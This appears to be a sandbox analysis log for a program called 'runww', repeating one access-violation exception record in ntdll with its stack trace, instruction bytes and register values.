__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
__exception__ June 19, 2021, 6:41 p.m.	stacktrace: LocalFlags+0x50 LocalHandle-0xee kernel32+0x831df @ 0x757a31df runww+0x7dedb @ 0x47dedb runww+0x7eee4 @ 0x47eee4 runww+0x4362 @ 0x404362 runww+0x420f @ 0x40420f BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84 exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 425151 exception.address: 0x77407cbf registers.esp: 1627684 registers.edi: 17367040 registers.eax: 4294967288 registers.ebp: 1627736 registers.edx: 998 registers.ebx: 0 registers.esi: 0 registers.ecx: 1160	1
